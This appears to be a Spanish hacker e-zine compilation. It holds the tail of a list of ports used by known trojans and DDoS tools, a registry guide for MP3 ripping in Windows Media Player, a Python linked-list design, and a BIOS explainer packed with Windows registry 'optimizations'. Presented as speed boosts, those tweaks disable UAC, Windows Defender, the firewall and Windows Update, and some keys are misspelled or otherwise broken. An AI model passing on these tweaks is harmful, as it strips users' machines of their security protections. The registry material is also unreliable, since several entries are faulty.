puerto 23005 NetTrash, Olive, Oxon
puerto 23006 NetTrash
puerto 23023 Logged
puerto 23032 Amanda
puerto 23321 Konik
puerto 23432 Asylum
puerto 23456 Evil FTP, Ugly FTP, Whack Job
puerto 23476 Donald Dick
puerto 23476 (UDP) - Donald Dick
puerto 23477 Donald Dick
puerto 23777 InetSpy
puerto 24000 Infector
puerto 24289 Latinus
puerto 25123 Goy'Z TroJan
puerto 25555 FreddyK
puerto 25685 MoonPie
puerto 25686 MoonPie
puerto 25982 MoonPie
puerto 26274 (UDP) - Delta Source
puerto 26681 Voice Spy
puerto 27160 MoonPie
puerto 27374 Bad Blood, EGO, Fake SubSeven, Lion, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven 2.2, SubSeven Muie, The Saint, Ttfloader, Webhead
puerto 27444 (UDP) - Trinoo
puerto 27573 SubSeven
puerto 27665 Trinoo
puerto 28431 Hack´a´Tack
puerto 28678 Exploiter
puerto 29104 NetTrojan
puerto 29292 BackGate
puerto 29369 ovasOn
puerto 29559 Latinus
puerto 29891 The Unexplained
puerto 30000 Infector
puerto 30001 ErrOr32
puerto 30003 Lamers Death
puerto 30005 Backdoor JZ
puerto 30029 AOL trojan
puerto 30100 NetSphere
puerto 30101 NetSphere
puerto 30102 NetSphere
puerto 30103 NetSphere
puerto 30103 (UDP) - NetSphere
puerto 30133 NetSphere
puerto 30303 Sockets des Troie
puerto 30700 Mantis
puerto 30947 Intruse
puerto 30999 Kuang2
puerto 31221 Knark
puerto 31335 Trinoo
puerto 31336 Bo Whack, Butt Funnel
puerto 31337 ADM worm, Back Fire, Back Orifice 1.20 patches, Back Orifice (Lm), Back Orifice russian, Baron Night, Beeone, bindshell, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, Gummo, icmp_pipe.c, Linux Rootkit IV (4), Sm4ck, Sockdmini
puerto 31337 (UDP) - Back Orifice, Deep BO
puerto 31338 Back Orifice, Butt Funnel, NetSpy (DK)
puerto 31338 (UDP) - Deep BO, NetSpy (DK)
puerto 31339 NetSpy (DK), NetSpy (DK)
puerto 31557 Xanadu
puerto 31666 BOWhack
puerto 31745 BuschTrommel
puerto 31785 Hack´a´Tack
puerto 31787 Hack´a´Tack
puerto 31788 Hack´a´Tack
puerto 31789 (UDP) - Hack´a´Tack
puerto 31790 Hack´a´Tack
puerto 31791 (UDP) - Hack´a´Tack
puerto 31792 Hack´a´Tack
puerto 32001 Donald Dick
puerto 32100 Peanut Brittle, Project nEXT
puerto 32418 Acid Battery
puerto 32791 Acropolis
puerto 33270 Trinity
puerto 33333 Blakharaz, Prosiak
puerto 33567 Lion, T0rn Rootkit
puerto 33568 Lion, T0rn Rootkit
puerto 33577 Son of PsychWard
puerto 33777 Son of PsychWard
puerto 33911 Spirit 2000, Spirit 2001
puerto 34324 Big Gluck, TN
puerto 34444 Donald Dick
puerto 34555 (UDP) - Trinoo (for Windows)
puerto 35555 (UDP) - Trinoo (for Windows)
puerto 37237 Mantis
puerto 37266 The Killer Trojan
puerto 37651 Yet Another Trojan - YAT
puerto 38741 CyberSpy
puerto 39507 Busters
puerto 40412 The Spy
puerto 40421 Agent 40421, Masters Paradise
puerto 40422 Masters Paradise
puerto 40423 Masters Paradise
puerto 40425 Masters Paradise
puerto 40426 Masters Paradise
puerto 41337 Storm
puerto 41666 Remote Boot Tool - RBT, Remote Boot Tool - RBT
puerto 44444 Prosiak
puerto 44575 Exploiter
puerto 44767 (UDP) - School Bus
puerto 45559 Maniac rootkit
puerto 45673 Acropolis
puerto 47017 T0rn Rootkit
puerto 47262 (UDP) - Delta Source
puerto 48004 Fraggle Rock
puerto 48006 Fraggle Rock
puerto 49000 Fraggle Rock
puerto 49301 OnLine KeyLogger
puerto 50000 SubSARI
puerto 50130 Enterprise
puerto 50505 Sockets des Troie
puerto 50766 Fore, Schwindler
puerto 51966 Cafeini
puerto 52317 Acid Battery 2000
puerto 53001 Remote Windows Shutdown - RWS
puerto 54283 SubSeven, SubSeven 2.1 Gold
puerto 54320 Back Orifice 2000
puerto 54321 Back Orifice 2000, School Bus
puerto 55165 File Manager trojan, File Manager trojan, WM Trojan Generator
puerto 55166 WM Trojan Generator
puerto 57341 NetRaider
puerto 58339 Butt Funnel
puerto 60000 Deep Throat, Foreplay, Sockets des Troie
puerto 60001 Trinity
puerto 60008 Lion, T0rn Rootkit
puerto 60068 Xzip 6000068
puerto 60411 Connection
puerto 61348 Bunker-Hill
puerto 61466 TeleCommando
puerto 61603 Bunker-Hill
puerto 63485 Bunker-Hill
puerto 64101 Taskman
puerto 65000 Devil, Sockets des Troie, Stacheldraht
puerto 65390 Eclypse
puerto 65421 Jade
puerto 65432 The Traitor (= th3tr41t0r)
puerto 65432 (UDP) - The Traitor (= th3tr41t0r)
puerto 65530 Windows Mite
puerto 65534 /sbin/initd
puerto 65535 Adore worm, RC1 trojan, Sins

Continuar leyendo

Grabar ficheros MP3 con Windows Media Player 8 ó 9 desde CD

Steso [steso@fcf.granma.inf.cu]

Inicialmente cuando escribí este texto solo lo había hecho para el Media Player 8, fue luego que lo intenté con el 9 y los pasos a seguir son los mismos, tanto para uno como para otro. En caso de que tengas instalada la versión 10 o superior del Media Player no será necesario hacer toda esta serie de modificaciones en el regedit, ya que el Media Player 10 trae integrado la Opción de copiar música en formato MP3 desde un CD, no obstante espero que estás líneas les sea de interés a muchos, y que como yo resuelvan este pequeño detalle respecto al Media Player 8 ó 9.

Descripción

Muchas personas desconocen que Windows Media Player 8 y 9 (tal como vienen en Windows XP) permite la extracción de audio directamente a formato MP3 (además de WMA), aunque es necesario hacer algunos "arreglos" para conseguir esta funcionalidad:

Para ello, accedemos al registro del sistema (regedit.exe) y vamos a la clave:

HKEY_LOCAL_MACHINE/Software/Microsoft/MediaPlayer.

Una vez en ella, creamos una nueva clave llamada Settings, y otra más, hija de la anterior, llamada MP3Encoding, dentro de la clave Settings (similar a crear directorios/subdirectorios).

Dentro de este último, tenemos que crear cuatro claves del tipo DWORD con los nombres LowRate, MediumRate, MediumHighRate y HighRate (se refieren a la calidad de muestreo, y, concretamente, con 56, 64, 128 y 192 kbps, respectivamente).

La mejor manera de introducir estos valores en el registro es cambiar al modo decimal cuando se edite cada valor, e introducir estos valores seguidos de 3 ceros (por ejemplo 192000). Es mucho más sencillo que trabajar en hexadecimal.

No obstante, en el caso de quieras trabajar desde el modo hexadecimal, los valores para la calidad de muestreo decimal y hexadecimal respectivamente son los siguientes:

LowRate: valor decimal (56000), hexadecimal (dac0)
MediumRate: valor decimal (64000), hexadecimal (fa00)
MediumHighRate: valor decimal (128000) hexadecimal (1f400)
HighRate: valor decimal (192000), hexadecimal (2ee00)

Una vez realizado esto, ya puedes ir al reproductor de medios y en Herramientas/Opciones, en la pestaña Copiar música verás que la lista desplegable correspondiente al formato de grabación está habilitada e incluye el formato MP3. En la barra deslizante inferior, puedes elegir entre las cuatro calidades especificadas.

Además de estas puedes elegir otras frecuencias de muestreo a las expuestas en el ejemplo anterior, sabiendo que además son válidos los valores de muestreo 112, 160, 224, 256 y 320 kbps). Lo que si no pueden variar es los nombres de las claves del tipo DWORD, solo podemos aumentarle la calidad de muestreo, pero deben mantener sus nombres. Los valores decimales y hexadecimales respectivamente para estos últimos son los siguientes:

LowRate: valor decimal (112000), hexadecimal (70) o decimal (160000) hexadecimal (a0).

Nota: puedes usar cualquiera de estos dos valores para el valor LowRate.

MediumRate: valor decimal (224000), hexadecimal (36b00)
MediumHighRate: valor decimal (256000), hexadecimal (3e800)
HighRate: valor decimal (320000), hexadecimal (4e200)

Saludos cordiales: Steso

Continuar leyendo

TDA Lista

Eddy [delvalle@otepr.co.cu]

Hola equipo de BlackHat esta vez traigo algo básico, que todo buen programador medianamente decente debe conocer. Es la implementación del tipo de dato abstracto (TDA) lista con una lista simplemente enlazada y además con el cálculo de el orden de cada uno de los algoritmos con la notación asintótica para el caso peor, de la que ya CHenry habló anteriormente.


Primero vamos a describir la implementación del TDA Nodo Simple, este tiene que tener un valor o una referencia a este y una referencia al nodo que lo sucede.

Clase Node

Nombre de Atributo Descripción
value Referencia al valor del nodo.
next Referencia al siguiente nodo.

 

Nombre de Método Descripción Orden del Algoritmo
__init__ Constructor de la clase. Se le pasan como parámetros opcionales la referencia a su valor y la referencia al siguiente nodo. O(1)
__str__ Convierte a cadena de caracteres el valor referenciado por el nodo. O(1)

Ahora echemos un vistazo a la descripción de la implementación del TDA Lista.

Clase SimpleLinkedList

Nombre de Atributo Descripción
__count Contador que indica la cantidad de elementos en la lista.
__headNode Referencia al nodo cabeza de la lista
__lastNode Referencia al nodo final de la lista
__iterCursor Referencia al nodo en el que se está iterando en ese instante en la lista

 

Nombre de Método Descripción Orden del Algoritmo
__init__ Constructor de la clase. O(1)
__getitem__ Indexador para conocer el valor de un elemento. Recibe como parámetro un entero el cual es la posición del elemento del que se desea conocer el valor. Devuelve una copia del valor de ese elemento O(n)
__setitem__ Indexador para establecer el valor de un elemento. Recibe como parámetro un entero y una referencia a un valor. El entero es la posición donde se desea establecer el valor. O(n)
__delitem__ Elimina un elemento de la lista. Recibe como parámetro la posición que se va a eliminar. O(n)
__add__ Sobrecarga del operador +. Toma como parámetro otra lista simplemente enlazada y devuelve una nueva lista la cual es el resultado de la concatenación de las dos lista O(n)
__str__ Se ejecuta cuando el objeto es convertido a cadena de caracteres, este método genera una cadena de caracteres con cada uno de los valores de los nodos de la lista convertidos a cadena. O(n)
__iter__ Permite a la clase ser iterada por ciclos como el for.
Para que la clase pueda ser iterada simultaneamete por varios ciclos a la vez este método devuelve una copia del objeto.
O(1)
next Devuelve el elemento de la lista sobre el cual se está iterando y avanza al siguiente. En caso de llegar al fin de la lista este método levanta una excepción para detener las iteraciones O(1)
__AdvanceTo Devuelve un nodo de la lista, el cual se corresponde con el índice que se le pasó al método O(n)
Join Empata dos listas, la actual y la que se le pasa como parámetro. Creando una sola lista y los nombres de las listas ahora referencian a la misma lista. O(1)
Add Agrega un nuevo elemento a la lista. O(1)
Clear Limpia la lista y la deja vacía. O(1)
LocateFirst Devuelva la posición de la primera ocurrencia en la lista del valor que se le pasa como parámetro. O(n)
Locate Devuelve una lista con las posiciones donde ocurre el valor que se le pasa como parámetro en la lista. O(n)
Insert Inserta en la lista un nuevo elemento con el valor y la posición que se le pasan como parámetros O(n)
Reverse Invierte el orden de los elementos de la lista, la pone "patas arriba". O(n)
QSort Ordena la lista de menor a mayor usando el algoritmo de ordenamiento QuickSort O(n log(n))


Ahora pasamos a ver la implementación en Python:
Nota: La implementación se encuentra en la sección de Códigos

Continuar leyendo

La BIOS elucidada

Adrian Cepero [yimaras@yahoo.es]

Consagrado, capitalmente a Mr I/O. Venias y rendibúes de Adrian Cepero, por la agudeza advertida.

Por entre inicuos, sumarios
me han trillado mis ardides,
donde son los daños daños
y los gozos, admisibles.


Adrian Cepero. C

Expedito Boot para Windows uE XP

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]
"VideoInitTime"=dword:00000122
"AppLaunchMaxNumPages"=dword:00000fa0
"AppLaunchMaxNumSections"=dword:000000aa
"AppLaunchTimerPeriod"=hex:80,69,67,ff,ff,ff,ff,ff
"BootMaxNumPages"=dword:0001f400
"BootMaxNumSections"=dword:00000ff0
"BootTimerPeriod"=hex:00,f2,d8,f8,ff,ff,ff,ff
"MaxNumActiveTraces"=dword:00000008
"MaxNumSavedTraces"=dword:00000008
"RootDirPath"="Prefetch"
"HostingAppList"="DLLHOST.EXE,MMC.EXE,RUNDLL32.EXE"

Expedito Boot para Windows uE Vista.

; Desactivar UAC
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

; Eliminar Splash Windows Mail
[HKEY_CURRENT_USER\Software\Microsoft\Windows Mail]
"NoSplash"=dword:00000001

; Eliminar Windows Defender del Inicio
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"=-

; Eliminar flechas accesos directos
[HKEY_CLASSES_ROOT\lnkfile]
"IsShortcut"=-
[HKEY_CLASSES_ROOT\piffile]
"IsShortcut"=-

; Deshabilitar Servicios
; Windows Defender
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend]
"Start"=dword:00000004

; W32Time
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time]
"Start"=dword:00000004

; Windows Firewall
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MpsSvc]
"Start"=dword:00000004

; Windows Update
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000004

Inicio Optimizado para Windows uE

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Common\Internet]
"UseOnlineContent"=dword:00000002
[HKEY_CURRENT_USER\Software\Microsoft\Office\Common]
"QMEnable"=dword:00000000

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Connection Wizard]
"Completed"=dword:00000001

[-HKEY_CLASSES_ROOT\.avi\ShellEx]
[-HKEY_CLASSES_ROOT\.mpg\ShellEx]
[-HKEY_CLASSES_ROOT\.mpe\ShellEx]
[-HKEY_CLASSES_ROOT\.mpeg\ShellEx]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_ShowNetConn"=dword:00000001;

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"DisableThumbnailCache"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www. BlackHat.cu/"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsMediaPlayer]
"GroupPrivacyAcceptance"=dword:00000001

; Add Register / Unregister to Right Click Menu of .dll Files
[HKEY_CLASSES_ROOT\dllfile\Shell\Register\command]
@="regsvr32.exe \"%1\""
[HKEY_CLASSES_ROOT\dllfile\Shell\UnRegister\command]
@="regsvr32.exe /u \"%1\""

; Add Register / Unregister to Right Click Menu of .ocx Files
[HKEY_CLASSES_ROOT\ocxfile\Shell\Register\command]
@="regsvr32.exe \"%1\""
[HKEY_CLASSES_ROOT\ocxfile\Shell\UnRegister\command]
@="regsvr32.exe /u \"%1\""

; Remove More Themes Online... from Themes Dropdown Box
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\DownloadSites]

Disímiles monografías antepone se al sumario, muestreado en factor, más las presentes declaran de irresuelto modo, novicios tópicos en demandante cuantía (Valía intrínseca). Disconformidad u desunión temática, constriñen, mancomunan y aúnan resulta comezón.

Valores de la BIOS

LOAD BIOS DEFAULTS: Carga cadena de valores por defecto de escasa o nula optimización contenida, frecuentemente útil para remontarnos a alineaciones previas. (Genérico)

LOAD SYSTEM DEFAULTS: Opción cuyos corolarios di varía de una BIOS a otra, en ciertos casos, carga cadena de valores por defecto de escasa o nula optimización contenida (Load Bios Defaults), en otros, carga valores ya optimizados u ultima serie de valores resguardados por el usuario. (Genérico)

LOAD TURBO DEFAULTS: Carga los valores que estima óptimos para acrecentar el redimiendo del ordenador. (Genérico)

HDD LOW LEVEL FORMAT: Tratase de un formateo más crecido de lo uniforme, no solo excluye datos, sino que reconstituye el arreglo del disco, usase cuando el disco falla corrientemente o encuentra se alojando un virus insidioso en el mismo.

STANDARD CMOS SETUP

NOTA: Varios conceptos esgrimidos en el subsecuente memorándum exhiben concepciones cardinales. Atentamente, ruego que me dispensen por las molestias acaecidas.

DATE (FECHA): Instituye fecha. (Genérico)
TIME (HORA): Instituye Hora. (Genérico)

HARD DISKS: Coexisten 47 tipos de discos rígidos heterogéneos, los más usados alojan se en Boot.ini di variante (Parte Primera acotada en BlackHat Ejemplar 68). (Genérico)

- Type (Tipo Auto): El ordenador calcula valores acercados. (Genérico)
- Type (Tipo User): Consiente enclavar valores manuales. (Genérico)
- Type (Tipo None): Carencia de disco rígido. (Genérico)
- Size (Tamaño): Cómputo acometido por el ordenador a partir de datos enclavados por el usuario. (Genérico)
- Cylinders (Cilindros): Cifra de cilindros contenidos. (Genérico)
- Heads (Cabezas): Cifra de cabezas contenidas. (Genérico)
- WritePrecomp (Precompensación de escritura): Parámetro técnico, usase en discos rígidos vetusto, en discos rígidos novicios suelen ser 0. (Genérico)
- LandZone (Zona de aparcado de las cabezas): Parámetro técnico, actualmente suele ser 0 u 65535 análogo. (Genérico)
- Sectors (Sectores): Cifra de sectores contenidos por pista. (Genérico)
- Mode (Modo de funcionamiento): Para discos rígidos pequeños (Menos de 528 MB) usase el modo normal, para discos rígidos de mayor capacidad, usase el modo LBA ó bien Large en caso de exhibirse di variación de estado.

AUTO (Automático): La BIOS acomete la escritura automáticamente de parámetros en el disco rígido. (Ostenta la desavenencia, que una vez encendido el ordenador la bios nivela parámetros acaecidos, causando retardo en la apertura) (Genérico)

NOTA: Mudando estos valores en el registro de Windows, depurase el rendimiento

-Optimizar el Desfragmentador del disco rígido:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Defrag\AppStartParams]
"MaxApps"=dword:00000120
"MaxNoUseDays"=dword:00000060
"MinLogSize"=dword:00000450
- Optimizar el rendimiento de inicio del disco rígido:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction]
"Enable"="Y"
-Optimizar las filas contiguas del Sistema:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"ContigFileAllocSize"=dword:00000200
-NTFS reserva de la tabla maestra (MFT):
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsMftZoneReservation"=dword:00000004
-UDMA66 para Intel chipset:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}\0000]
"EnableUDMA66"=dword:00000001
-Desactivar la creación de nombres 8.3:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisable8dot3NameCreation"=dword:00000001
-Desactivar Last Access Time:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisableLastAccessUpdate"=dword:00000001

-Deshabilitar Autoexec (Depura el inicio):
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec"="0"

El CD ROM IDE: Divisado de manera maquinal. (Genérico)
NOTA: Mudando estos valores en el registro de Windows, depurase el rendimiento
- Acrecentar la productividad del cd o dvd
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"CachéSize"=hex:ff,ff,00,00 (Di varia)
"Prefetch"=dword:00004000 (Di varia)
"PrefetchTail"=dword:00004000 (Di varia)
-Optimización de los lectores CD-ROM y DVD-ROM
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem\CDFS]
Subsecuentemente, todas las claves viables con sus particulares.
Valor Binario CacheSize (memoria caché imputada al lector CD/DVD-ROM):
-Genérico 6b 02 00 00
-Caché de tamaño medio: d6 04 00 00 (Valor recomendado)
-Caché de Gran Volumen: ac 09 00 00

-Valor Binario Prefetch (Velocidad del lector de CD-ROM):
- Lector 8X: c0 01 00 00

-Lector 16X: 80 03 00 00
- Lector 24X: 40 05 00 00
-Lector 32X: 00 07 00 00
-Lector 40X: c0 08 00 00
-Lector 48X: 80 0a 00 00

-Valor Binario PrefetchTail (Velocidad del lector de DVD-ROM):
-Lector 2X: 80 03 00 00
-Lector 4X: 00 07 00 00
-Lector 6X: 80 0a 00 00

DRIVE A/B (DISQUETERA)

-None (Ninguna): Carencia de drive a/b. (Genérico)
-Drive A/B: Disco magnético para resguardar y redimir programas y datos. (Genérico)
-360 Kb 5.25
-1.2 Mb 5.25
-720 Kb 3.5
-1.44 Mb 3.5
-2.88 Mb 3.5

ViDEO (Arquetipo de Pantalla): Declara tarjeta de vídeo de apertura (Genérico EGA/VGA), solamente factible en el sumario de inicio. (Genérico)
-EGA/VGA
-CGA40
-CGA80
-Mono
NOTA: Mudando estos valores en el registro de Windows, depurase el rendimiento
-Acrecentar la resolución de los iconos:
[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics]
"Shell Icon BPP"="24"
-Acrecentar los colores:
[HKEY_CURRENT_USER\Control Panel\Colors]
"ActiveBorder"="212 208 200"
"ActiveTitle"="130 130 130"
"AppWorkSpace"="128 128 128"
"Background"="70 70 70"
"ButtonAlternateFace"="181 181 181"
"ButtonDkShadow"="133 135 140"
"ButtonFace"="240 240 240"
"ButtonHilight"="255 255 255"
"ButtonLight"="220 223 228"
"ButtonShadow"="167 166 170"
"ButtonText"="0 0 0"
"GradientActiveTitle"="113 113 113"
"GradientInactiveTitle"="172 172 172"
"GrayText"="167 166 170"
"Hilight"="130 130 130"
"HilightText"="255 255 255"
"HotTrackingColor"="\"0 0 255\""
"InactiveBorder"="212 208 200"
"InactiveTitle"="152 152 152"
"InactiveTitleText"="250 250 255"
"InfoText"="0 0 0"
"InfoWindow"="255 255 225"
"Menu"="252 252 252"
"MenuText"="0 0 0"
"Scrollbar"="212 208 200"
"TitleText"="255 255 255"
"Window"="255 255 255"
"WindowFrame"="0 0 0"
"WindowText"="0 0 0"
"MenuHilight"="130 130 130"
"MenuBar"="240 240 240"
-Claves para optimizar tarjetas gráficas ATI:
[HKEY_LOCAL_MACHINE\SOFTWARE\ATI Technologies\CDS\0000\0\ASIC]
"2D Acceleration"="Yes (0x00000001)"
"3D Acceleration"="Yes (0x00000001)"
"Motion Compensation"="Yes (0x00000001)"
[HKEY_LOCAL_MACHINE\SOFTWARE\ATI Technologies\Desktop]
"D3D"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\ATI Technologies\Driver\ddhal]
"EnableKatmai"="1"

HALT ON (Detención de apertura): Habilitado interrumpe la apertura (Power and Self Test) si divisa algún desliz. (Genérico)

BIOS FEATURES SETUP

VIRUS WARNING: Activado no consiente escribir sobre la tabla de particiones o sector arranque del disco rígido. (Genérico)

WARNING Disk Boot Sector is to be modified Type “Y” to accept write or “N” to abort write

MEMORIA CACHÉ: Las opciones external caché y CPU L2 ECC Checking compensan el rendimiento global del ordenador (Nunca deben retirarse) (Genérico)
NOTA: Mudando estos valores en el registro de Windows, depurase el rendimiento global.

-SecondLevelDataCache
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"SecondLevelDataCache"=dword:00001024
NOTA: El valor dword di varía según la Cache ostensible:
-cache128k: dword:00000128
-cache256k: dword:00000256
-cache512k: dword:00000512
-cache1M: dword:00001024
-cache2M: dword:00002048
-cache4M: dword:00004096
-Acrecentar cache DNS
[HKEY_LOKAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CaheHashTableBucketSize"=dword:00000001
"CaheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

-Acrecentar el control de cache del Sistema
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"IoPageLockLimit"=dword:00010000

-Acrecentar la cache de PRE-lectura
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"ReadAheadThresold"=hex:00,00,00,0f

QUIT POWER ON SELF TEST (INICIACIÓN RÁPIDA): Parámetro que aligera la apertura de Windows, efectuando menos chequeos. (Genérico)

BOOT SEQUENCE (Secuencia de Apertura): Pauta en la BIOS cual será la sucesión de apertura. (Genérico)

1. A, C, CD- ROM.
2. C, A, CD- ROM.
3. CD- ROM, C, A.
4. C only, etc.

SWAP FLOPPY DRIVE (INTERCAMBIO DE DISQUETERAS): Consiente el intercambio entre FLOPPY DRIVE, (AB o BA) sin necesidad de consignarse al Hardware. (Genérico)

BOOT UP NUMLOCK STATUS (TECLADO NUMÉRICO): Habilita el teclado numérico en la apertura. (Genérico)
TYPEMATIC DELAY, TYPEMATIC RATE (CONFIGURACIÓN DEL TECLADO): Parámetro comisionado para configurar la sensibilidad y velocidad del teclado. (Genérico)

SECURITY OPTION (OPCIONES DE SEGURIDAD): La opción System restringe el acceso al setup de la BIOS y al Sistema Operativo Germinal, la opción setup confiere se al propio setup, ambas opciones faenan, mancomunadamente, con la opción Password Setting. (Genérico)

VIDEO BIOS SHADOW (COPIA ESPEJO DE LA ROM DE VÍDEO): Esta opción habilitada consiente que en la apertura del ordenador la ROM BIOS de la tarjeta de vídeo se cargué en memoria (VDRAM), admitiendo un expedito muestreo. (Genérico)

CHIPSET FEATURES SETUP

Auto Configuration: Carga cadena de valores por defecto de escasa o nula optimización contenida, frecuentemente útil para remontarnos a alineaciones previas. (Genérico)

DRAM RAS# Precharge Time: Número de ciclos que toma el RAS para acopiar su carga antes del refrescamiento de la DRAM.

DRAM R/W Leadoff Timing: Valor de turno antes de cada lectura ó escritura a la memoria.

SDRAM RAS-to-CAS Delay: Indica cuantos ciclos de reloj demanda la memoria para prepararse para otro acceso.

DRAM Read/Write Burst: Tiempo de lectura/escritura para la DRAM en modo BURST.

Turbo Read Leadoff: Acorta los ciclos y optimizar el rendimiento del ordenador.

DRAM Speculative Leadoff: Una petición de lectura desde la CPU al controlador de la DRAM incluye la dirección de memoria del dato seleccionado. Cuando está habilitado el controlador de la DRAM pasa el comando de lectura a la memoria velozmente antes de que se acaezca enteramente la descodificación de la dirección de la memoria, sucediendo expeditamente el proceso de lectura.

Turn-Around Insertion: El chipset inserta un ciclo de reloj extra a los ciclos de la DRAM.

System BIOS, video BIOS, video RAM Cacheable: Dicho arreglo consiente que se tramiten datos a la cache de Segundo Nivel, incrementando el rendimiento de la BIOS, (Es ventajoso deshabilitar esta opción para resguardar espacio en el cache de Segundo Nivel.)

Memory Hole At 15M-16M: Antiquísima opción que le consiente reservar 1 MB de memoria para ser usado en las tarjetas ISA. (Es ventajoso deshabilitar esta opción)

NOTA: Mudando estos valores en el registro de Windows, depurase el rendimiento global.

-Acrecentar la velocidad de carga de las aplicaciones:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]
"EnablePrefetcher"=dword:00000005
-Aumento de memoria para las aplicaciones:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"LargeSystemCache"=dword:00000001

-Violentar la descarga de las DLL de la RAM:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"AlwaysUnloadDLL"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL]
@="1"

-Deshabilitar la paginación:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"DisablePagingExecutive"=dword:00000001

-Borrar el archivo de intercambio al cerrar el sistema Operativo:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

-Paginación del Sistema:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"SystemPages"=dword:00000000


Continuar leyendo